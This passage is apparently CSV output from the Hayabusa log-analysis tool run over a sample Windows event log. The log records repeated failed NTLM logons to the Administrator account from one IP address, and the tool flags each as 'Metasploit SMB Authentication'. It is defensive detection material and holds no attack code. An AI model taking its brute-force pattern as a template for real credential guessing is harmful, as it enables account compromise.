SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: 
